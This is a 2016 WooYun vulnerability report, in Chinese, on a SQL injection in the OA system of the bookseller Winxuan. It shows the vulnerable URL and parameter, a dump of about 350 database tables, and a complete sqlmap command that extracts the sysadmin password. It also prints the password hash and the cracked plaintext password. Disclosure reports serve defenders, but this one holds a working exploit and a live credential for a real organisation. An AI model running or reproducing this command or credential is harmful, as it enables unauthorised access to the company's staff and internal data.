当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0200324

漏洞标题:文轩网某管理系统SQL注入(垃圾袋引发的血案/大量数据/多处管理员帐号/内部信息/上千名管理员/内部资料/敏感信息)

相关厂商:winxuan.com

漏洞作者: DeadSea

提交时间:2016-05-03 13:31

修复时间:2016-05-09 09:00

公开时间:2016-05-09 09:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-05-03: 细节已通知厂商并且等待厂商处理中
2016-05-09: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

今天下楼的时候顺便丢垃圾,丢垃圾的时候发现一个包装袋,上面写着文轩网。然后回来就测试了一下,没想到引发了一场场血案啊

详细说明:

今天下楼的时候顺便丢垃圾,丢垃圾的时候发现一个包装袋,上面写着文轩网。然后回来就测试了一下,没想到引发了一场场血案啊

oa.winxuan.com


http://oa.winxuan.com/ServiceAction/com.velcro.base.GetDataAction?action=checkname&formid=1


formid存在注入

1.png


350个库啊,因为sqlmap不能直接显示出来,还是找日记一个一个手动排列的,就冲我这精神给20分吧。

JSP
back-end DBMS: Oracle
Database: OAUSER
+--------------------------------+---------+
| Table | Entries |
+--------------------------------+---------+
|SCORE | 17936023 |
| PERMISSIONLINKDOCBASE | 6342260 |
| LOG | 5749886 |
| PERMISSIONDETAILDOCBASE | 5503371 |
| SCORETMP | 1244885 |
| PERMISSIONDETAILWORKFLOWBASE | 304448 |
| PERMISSIONLINKWORKFLOWBASE | 293734 |
| PERMISSIONRULEDOCBASE | 262420 |
| PERMISSIONRULEWORKFLOWBASE | 262310 |
| WORKFLOWSTEPFINISHED | 183342 |
| WORKFLOWINFOFINISHED | 180505 |
| WORKFLOWOPERATORSFINISHED | 140586 |
| WORKFLOWLOGFINISHED | 125355 |
| ATTACH | 66960 |
| DOCATTACH | 54522 |
| WORKFLOWSTEP | 39600 |
| WORKFLOWINFO | 39180 |
| CATEGORYLINK | 38055 |
| DOCBASE | 35292 |
| PASSWORDHISTORY | 29312 |
| WORKFLOWLOG | 28212 |
| UFG7S2O41194588032176T | 27140 |
| EVENT | 19384 |
| WORKFLOWBASE | 15421 |
| PERMISSIONLINKPORTALCHANNALS | 15264 |
| PERMISSIONDETAILPORTALCHANNALS | 15249 |
| UFF7K8K61221633602612T | 13844 |
| UFJ3W3S41221633547510T | 13831 |
| UFL0X4U31236061379146T | 12725 |
| UFG3W9A31191920098875T | 12613 |
| LABEL | 11655 |
| UFG0Y5L41221633619659T | 11579 |
| UFA1Z8W21221633655798T | 9747 |
| UFH3E4W91191919765921T | 8970 |
| RTXU | 8194 |
| UFC4K0G21221633874179T | 8038 |
| FORMLAYOUTFIELD | 7956 |
| SYSUSER | 7922 |
| LABEL_NEW | 7859 |
| HUMRES | 7855 |
| SYSUSER_BAK | 7844 |
| HUMRES_BAK | 7777 |
| WORKFLOWOPERATORS | 7491 |
| UFW1C6R51221634541611T | 6319 |
| RTXUN | 6146 |
| UFG7S2O41194588032176 | 5869 |
| UFF2G8A01191907781421T | 5721 |
| HUMRES_BACK | 5572 |
| HUMRESTEMP | 5163 |
| STATIONINFO | 4112 |
| Z1 | 3892 |
| DOCINDIV | 3743 |
| STATIONLINK | 3491 |
| FORMFIELD | 3029 |
| UFG3W9A31191920098875 | 2857 |
| UFD1I6Q41194245212565 | 2695 |
| CATEGORY | 2435 |
| SELECTITEM | 2397 |
| UFG9O1U31427268735994T | 2397 |
| UFW1J9T61269934662222T | 2344 |
| IF_HUMRES | 2226 |
| UFH3E4W91191919765921 | 2166 |
| UFF2G8A01191907781421 | 2114 |
| UFA1Z8W21221633655798 | 1899 |
| UFF7K8K61221633602612 | 1899 |
| UFC4K0G21221633874179 | 1896 |
| UFW1C6R51221634541611 | 1896 |
| UFG0Y5L41221633619659 | 1894 |
| UFJ3W3S41221633547510 | 1894 |
| UFL0X4U31236061379146 | 1740 |
| UFZ1I5F91427270259217T | 1688 |
| IF_STATIONINFO | 1462 |
| ORGUNIT | 1332 |
| UFW4F2G21430722144985T | 1322 |
| KHZSJ | 1262 |
| UFJ4I3S41200992843804T | 1080 |
| UFA5Y7Z81200990289777T | 1078 |
| UFL2N6H71200991289728T | 1078 |
| UFY2Z9J91200993227970T | 1078 |
| UFO5T9B31200993254436T | 1077 |
| ORGUNITLINK | 1058 |
| UFN4Q0D91201065966034T | 1054 |
| BOOKSHEET | 1050 |
| SAPQQ | 1032 |
| RTXP | 1000 |
| UFI2T4P31385011501902T | 976 |
| ZZ | 963 |
| UFH4O4P21434439724854 | 955 |
| UFY3X5U21214977469835T | 903 |
| BB | 789 |
| UFE3V0Z41436239651329T | 752 |
| UNLOCKUSER | 698 |
| EXPORT | 677 |
| UFW1J9T61269934662222 | 640 |
| DR | 609 |
| NODEINFO | 592 |
| UFW4F2G21430722144985 | 539 |
| PIPENODESTYLE | 536 |
| UFT6Y0E21239169073156T | 525 |
| REMINDLOG | 498 |
| RYDRXX_BAK | 459 |
| UFR8V0S31201592887615T | 440 |
| REPORTFIELD | 437 |
| UFU4Q6L41193280564254T | 433 |
| DOCTYPE | 394 |
| REFOBJLINK | 364 |
| FORMLAYOUT | 361 |
| DIVPOSITION | 360 |
| MAILACCOUNT | 348 |
| REMINDRECEIVEOBJ | 337 |
| UFI2T4P31385011501902 | 336 |
| PERMISSIONLINKREPORTDEF | 334 |
| PORTALMODULES | 325 |
| UFG9O1U31427268735994 | 319 |
| UFZ1I5F91427270259217 | 319 |
| PERMISSIONDETAILREPORTDEF | 316 |
| PORTALCHANPARAMODULES | 286 |
| UFA2Q4C21193281172154T | 275 |
| MENU | 274 |
| MENUORG | 266 |
| PORTALMODULECONFIG | 256 |
| SELECTITEMTYPE | 253 |
| REMARK | 252 |
| UFF8U9E81395122755353T | 247 |
| UFE3V0Z41436239651329 | 243 |
| WBSTASKHISTORY | 235 |
| REPORTSEARCHFIELD | 226 |
| PERMISSIONRULEREPORTDEF | 211 |
| MYPERMITBAG | 210 |
| UFJ4I3S41200992843804 | 192 |
| UFA5Y7Z81200990289777 | 191 |
| UFL2N6H71200991289728 | 191 |
| UFO5T9B31200993254436 | 191 |
| UFY2Z9J91200993227970 | 191 |
| WBSDOCFLOW | 191 |
| UFN4Q0D91201065966034 | 188 |
| PERMISSIONRULEPORTALCHANNALS | 173 |
| UFK5R2Q01193282788864T | 167 |
| UFR8V0S31201592887615 | 167 |
| DELOBJ | 165 |
| IF_ORGUNIT | 163 |
| WBSTASK | 149 |
| FORMINFO | 147 |
| PORTALCHANPARAS | 144 |
| RYDRXX_BAK_1222 | 138 |
| UFY7Y3C31209373252583T | 131 |
| SYSRESOURCE | 126 |
| PAGEMENU | 117 |
| KMTOPIC | 115 |
| PORTAL | 107 |
| SYSUSERROLELINK | 106 |
| UFP6J3X91262843817858T | 104 |
| PIPEINFO | 102 |
| REMINDMESSAGEDETAIL | 97 |
| REMINDSENDOBJ | 97 |
| UFY3X5U21214977469835 | 97 |
| KMMAPTOPICLINK | 94 |
| SYSPERMRESLINK | 93 |
| PERMITBAG | 92 |
| UFY3T6F71193289145697T | 90 |
| SETITEM | 89 |
| HUMRESCUSTOMIZE | 85 |
| FORMLINK | 84 |
| SUBJECT | 84 |
| TEMP3 | 84 |
| UFS6J0V21186643740812T | 80 |
| UFY7Y3C31209373252583 | 79 |
| SEARCHCUSTOMIZEOPTION | 78 |
| TEMP1 | 75 |
| TEMP2 | 75 |
| CONTEMPFIELD | 74 |
| UFC4H0T11193280596918T | 70 |
| HHH | 67 |
| PERMISSIONRULEPIPEINFO | 65 |
| REFOBJ | 60 |
| WBSTASKTEMPLATE | 60 |
| UFA2Q4C21193281172154 | 58 |
| UFM8L3N01210227759384T | 58 |
| UFK5R2Q01193282788864 | 57 |
| UFC4H0T11193280596918 | 56 |
| UFU4Q6L41193280564254 | 56 |
| UFY3T6F71193289145697 | 56 |
| ADDRESSINFO | 51 |
| GYSZSJ | 51 |
| PERMISSIONLINKPROJECT | 50 |
| PERMISSIONDETAILPROJECT | 49 |
| UFQ9H8S71395725696697T | 49 |
| UFB5N0R31434341886193 | 47 |
| UFG5H0M21319164636037T | 47 |
| UFK4H5T01278382941766T | 47 |
| PIPEACCREDIT | 46 |
| ORGUNITTYPE | 44 |
| UFT6Y0E21239169073156 | 44 |
| RYDRXX | 43 |
| UFM2Y4U41210226662879T | 42 |
| REPORTDEF | 41 |
| SYSROLEPERMLINK | 41 |
| UFE3W8V51196906858771 | 41 |
| UFE3W8V51196906858771T | 41 |
| SELFCUSTOM | 37 |
| UFB9T5N81395985987280T | 36 |
| UFO3X9Z31395725358932T | 36 |
| AA | 35 |
| PORTALTOPIC | 35 |
| PORTALCHANNALS | 33 |
| UFE4O5K91191920595703T | 33 |
| UFX6P3U41214807405359T | 33 |
| UFP6J3X91262843817858 | 31 |
| UFS6J0V21186643740812 | 31 |
| UFF8U9E81395122755353 | 30 |
| UFE3Q6S51228892267536T | 28 |
| UFK4H5T01278382941766 | 27 |
| GYSZSJ_BAK | 25 |
| PERMISSIONRULEPROJECT | 24 |
| UFE3Q6S51228892267536 | 24 |
| UFT8H8N31319164144745T | 23 |
| UFE4O5K91191920595703 | 22 |
| UFR9F9Z51276157442595 | 22 |
| UFR9F9Z51276157442595T | 22 |
| AUTHORIZEOPERATION | 20 |
| UFQ9H8S71395725696697 | 20 |
| KMMAP | 19 |
| UFM8L3N01210227759384 | 19 |
| SYSPERMS | 18 |
| SYSROLE | 18 |
| UFG5H0M21319164636037 | 18 |
| WORKFLOWAUTHORIZELOG | 18 |
| UFU4M7L61205906651800T | 16 |
| UFC2N9R01208923738836T | 13 |
| FAVLIST | 12 |
| SETITEMTYPE | 12 |
| UFM2Y4U41210226662879 | 12 |
| UFQ0S2A91259133802297T | 12 |
| UFX6P3U41214807405359 | 12 |
| USERMENU | 12 |
| UFB4P7W91208923277799T | 11 |
| STATIONLEVELLINK | 10 |
| REMINDRULE | 9 |
| UFJ8Z6G41426816778795T | 9 |
| UFO3X9Z31395725358932 | 9 |
| UFT8H8N31319164144745 | 9 |
| VERSIONINFO | 9 |
| KHZSJ_BAK | 8 |
| PIPEDOCTYPE | 8 |
| UFB9T5N81395985987280 | 8 |
| UFC4B3Q21185525667890T | 8 |
| UFQ0S2A91259133802297 | 8 |
| ADDRESSSHEETMAP | 7 |
| SEARCHCUSTOMIZE | 7 |
| UFH2S6L11237441705568T | 7 |
| PORTALTOPICLINK | 6 |
| PROJECT | 6 |
| UDTYPE | 6 |
| UFL7E7V61259822162376T | 6 |
| UFP3K1Q01267680510921T | 6 |
| UFU4M7L61205906651800 | 6 |
| WBSVERSION | 6 |
| ATTACHMENT | 5 |
| CONTEMPLATE | 5 |
| CONTRACTTYPE | 5 |
| KEYINFO | 5 |
| UFC3H4A91228892239311T | 5 |
| UFC4B3Q21185525667890 | 5 |
| UFC4C3V21193888200526 | 5 |
| UFC4C3V21193888200526T | 5 |
| UFG1K2C01237771698639T | 5 |
| UFJ8Z6G41426816778795 | 5 |
| UFP3K1Q01267680510921 | 5 |
| PERMISSIONRULECUSTOMER | 4 |
| PERMISSIONRULEPRODUCT | 4 |
| PROJECTTYPE | 4 |
| UFC2N9R01208923738836 | 4 |
| UFL7E7V61259822162376 | 4 |
| UFT1Q4K71237184297382T | 4 |
| UFW4W9S01237184235289T | 4 |
| WORKFLOWAGENTINFO | 4 |
| AUTHTICKETINFO | 3 |
| UFB4P7W91208923277799 | 3 |
| UFG9Z3X81392010172464T | 3 |
| UFI3J3D61186471722328T | 3 |
| UFJ6Y6W11319179657036 | 3 |
| UFZ3K0Z41237875272949T | 3 |
| WBSINFO | 3 |
| WORKFLOWAUTHORIZE | 3 |
| PERMISSIONDETAILCONTRACT | 2 |
| PERMISSIONLINKCONTRACT | 2 |
| PERMISSIONLINKCUSTOMER | 2 |
| PERMISSIONLINKPRODUCT | 2 |
| PERMISSIONRULECONTRACT | 2 |
| REFOBJMODEL | 2 |
| UFD1Y7I61319173459654 | 2 |
| UFI3J3D61186471722328 | 2 |
| AAA | 1 |
| ASSETSTYPE | 1 |
| CUSTOMERTYPE | 1 |
| ID_RECODE_DONTDELETE | 1 |
| MAP | 1 |
| PERMISSIONDETAILASSETS | 1 |
| PERMISSIONDETAILCUSTOMER | 1 |
| PERMISSIONDETAILPRODUCT | 1 |
| PERMISSIONDETAILPROVIDER | 1 |
| PERMISSIONLINKASSETS | 1 |
| PERMISSIONLINKPROVIDER | 1 |
| PERMISSIONRULEASSETS | 1 |
| PERMISSIONRULEMODEL | 1 |
| PERMISSIONRULEPROVIDER | 1 |
| PRODUCTTYPE | 1 |
| PROVIDERTYPE | 1 |
| SHOPTYPE | 1 |
| UFC3H4A91228892239311 | 1 |
| UFD1Y7I61319173459654T | 1 |
| UFE6F0Y01186643861921 | 1 |
| UFE6F0Y01186643861921T | 1 |
| UFG1K2C01237771698639 | 1 |
| UFH2S6L11237441705568 | 1 |
| UFJ6Y6W11319179657036T | 1 |
| UFS6Z2C81395646749424 | 1 |
| UFS6Z2C81395646749424T | 1 |
| UFT1Q4K71237184297382 | 1 |
| UFV3W4W41395647003213 | 1 |
| UFV3W4W41395647003213T | 1 |
| UFW4W9S01237184235289 | 1 |
| UFZ3K0Z41237875272949 | 1 |
+--------------------------------+---------+


因为表太多,不知道管理员账户是那个。可以利用语句直接在sqlmap中查询。
默认管理员是sysadmin

C:\Python27\sqlmap>sqlmap.py -u "http://oa.winxuan.com/ServiceAction/com.velcro.
base.GetDataAction?action=checkname&formid=1" -p formid --tamper=space2comment -
-batch -D zuzhibu -T sysuser --sql-query "select logonpass from sysuser where lo
ngonname='sysadmin'"


e3570e9e977fabb2ac818edc9a6a2e38


解密后为asdlkj321

1.png


1.png


5000名后台管理信息

1.png


1.png


1.png


小学管理系统,可以看视频等。。
大量敏感信息

1.png


点到即止,么么哒

漏洞证明:

点到即止,么么哒

1.png

修复方案:

版权声明:转载请注明来源 DeadSea@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-05-09 09:00

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无